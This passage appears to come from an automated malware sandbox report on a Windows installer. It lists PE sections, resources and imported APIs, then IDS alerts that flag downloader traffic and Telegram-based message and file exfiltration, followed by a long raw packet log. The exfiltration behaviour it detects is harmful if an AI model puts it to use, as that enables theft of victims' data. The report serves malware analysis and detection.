                                                                                                                                                                    .data0xa0000x203580x60073e3da5d6c2dd1bec8a02d238a90e209False0.5149739583333334data4.09485328769633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .ndata0x2b0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc0x4f0000x1c5c80x1c6000e60bf3ace34d6a7de54772dad04b786False0.8734684746696035data7.577852317524115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_ICON0x4f4180xc9c0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9973280669144982
                                                                                                                                                                    RT_ICON0x5bdd80x5d9cPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9926556501418795
                                                                                                                                                                    RT_ICON0x61b780x2e8ePNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9979023326061419
                                                                                                                                                                    RT_ICON0x64a080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4182572614107884
                                                                                                                                                                    RT_ICON0x66fb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.45075046904315197
                                                                                                                                                                    RT_ICON0x680580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.6625799573560768
                                                                                                                                                                    RT_ICON0x68f000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7382671480144405
                                                                                                                                                                    RT_ICON0x697a80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.6317073170731707
                                                                                                                                                                    RT_ICON0x69e100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.5505780346820809
                                                                                                                                                                    RT_ICON0x6a3780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6187943262411347
                                                                                                                                                                    RT_ICON0x6a7e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.7002688172043011
                                                                                                                                                                    RT_ICON0x6aac80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8074324324324325
                                                                                                                                                                    RT_DIALOG0x6abf00x100dataEnglishUnited States0.5234375
                                                                                                                                                                    RT_DIALOG0x6acf00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                    RT_DIALOG0x6ae100xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                    RT_DIALOG0x6aed80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                    RT_GROUP_ICON0x6af380xaedataEnglishUnited States0.6379310344827587
                                                                                                                                                                    RT_VERSION0x6afe80x29cdataEnglishUnited States0.5089820359281437
                                                                                                                                                                    RT_MANIFEST0x6b2880x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                                                                    DLLImport
                                                                                                                                                                    KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                    USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                                                    ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                    2024-12-24T11:28:19.193344+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949859172.217.19.238443TCP
                                                                                                                                                                    2024-12-24T11:28:27.076023+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949881193.122.6.16880TCP
                                                                                                                                                                    2024-12-24T11:28:29.591650+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949881193.122.6.16880TCP
                                                                                                                                                                    2024-12-24T11:28:31.203039+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949893172.67.177.134443TCP
                                                                                                                                                                    2024-12-24T11:28:32.638538+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949898193.122.6.16880TCP
                                                                                                                                                                    2024-12-24T11:28:35.701053+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949907193.122.6.16880TCP
                                                                                                                                                                    2024-12-24T11:28:43.419540+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949930172.67.177.134443TCP
                                                                                                                                                                    2024-12-24T11:28:46.508208+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949938172.67.177.134443TCP
                                                                                                                                                                    2024-12-24T11:28:49.552413+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949947172.67.177.134443TCP
                                                                                                                                                                    2024-12-24T11:28:54.646489+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.949962149.154.167.220443TCP
                                                                                                                                                                    2024-12-24T11:29:01.923440+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949980149.154.167.220443TCP
                                                                                                                                                                    2024-12-24T11:29:05.422716+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949990149.154.167.220443TCP
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 24, 2024 11:28:16.591463089 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:16.591522932 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:16.591747046 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:16.602967024 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:16.602998972 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:18.299297094 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:18.299376011 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:18.300062895 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:18.300126076 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:18.353813887 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:18.353851080 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:18.354142904 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:18.354214907 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:18.356811047 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:18.403331041 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:19.193259001 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:19.193417072 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:19.193443060 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:19.193480015 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:19.193604946 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:19.193643093 CET44349859172.217.19.238192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:19.193706989 CET49859443192.168.2.9172.217.19.238
                                                                                                                                                                    Dec 24, 2024 11:28:19.365014076 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:19.365056992 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:19.365145922 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:19.365379095 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:19.365391016 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:21.065679073 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:21.065747023 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:21.069694042 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:21.069701910 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:21.069942951 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:21.069998026 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:21.070324898 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:21.115324974 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.030258894 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.030364037 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.044653893 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.044754028 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.150254011 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.150336027 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.153846025 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.153904915 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.153917074 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.153960943 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.222255945 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.222363949 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.226006031 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.226109982 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.226130009 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.226211071 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.231617928 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.231693983 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.239065886 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.239135027 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.241159916 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.241216898 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.249041080 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.249113083 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.254595995 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.254673958 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.258178949 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.258380890 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.269218922 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.269310951 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.272932053 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.272989035 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.282468081 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.282548904 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.284795046 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.284856081 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.296667099 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.296755075 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.298743010 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.298805952 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.310707092 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.310764074 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.313261032 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.313328981 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.324014902 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.324079037 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.326334953 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.326387882 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.337677002 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.337754011 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.340214014 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.340264082 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.351468086 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.351547003 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.351598978 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.351644993 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.365534067 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.365586996 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.381448030 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.381565094 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.381577969 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.381714106 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.414423943 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.414513111 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.414702892 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.414756060 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.419611931 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.419657946 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.421189070 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.421237946 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.423391104 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.423434973 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.429713964 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.429761887 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.429940939 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.429985046 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.447482109 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.447550058 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.447573900 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.447623014 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.447635889 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.447689056 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.451476097 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.451534986 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.451574087 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.451622009 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.462573051 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.462618113 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.462721109 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.462785006 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.472918034 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.472990990 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.473052979 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.473102093 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.482949018 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.483014107 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.483830929 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.483875036 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.493168116 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.493233919 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.493242979 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.493289948 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.503334045 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.503384113 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.503391981 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.503436089 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.513801098 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.513851881 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.513900042 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.513945103 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.524244070 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.524290085 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.524300098 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.524338961 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.533570051 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.533622026 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.533704996 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.533747911 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.542870998 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.542918921 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.542936087 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.542974949 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.551765919 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.551837921 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.551898003 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.551948071 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.560759068 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.560822964 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.560837030 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.560874939 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.562159061 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.562207937 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.569273949 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.569339037 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.570682049 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.570745945 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.577718019 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.577914953 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.579322100 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.579374075 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.584429979 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.584479094 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.585743904 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.585791111 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.593008995 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.593056917 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.594197035 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.594242096 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.597573042 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.597620964 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.598673105 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.598716021 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.603719950 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.603766918 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.605061054 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.605108976 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.610534906 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.610591888 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.611823082 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.611875057 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.616686106 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.616750002 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.617413044 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.617458105 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.622051001 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.622109890 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.623229980 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.623275995 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.627414942 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.627474070 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.628623009 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.628670931 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.632715940 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.632765055 CET49866443192.168.2.9142.250.181.1
                                                                                                                                                                    Dec 24, 2024 11:28:24.633838892 CET44349866142.250.181.1192.168.2.9
                                                                                                                                                                    Dec 24, 2024 11:28:24.633883953 CET49866443192.168.2.9142.250.181.1
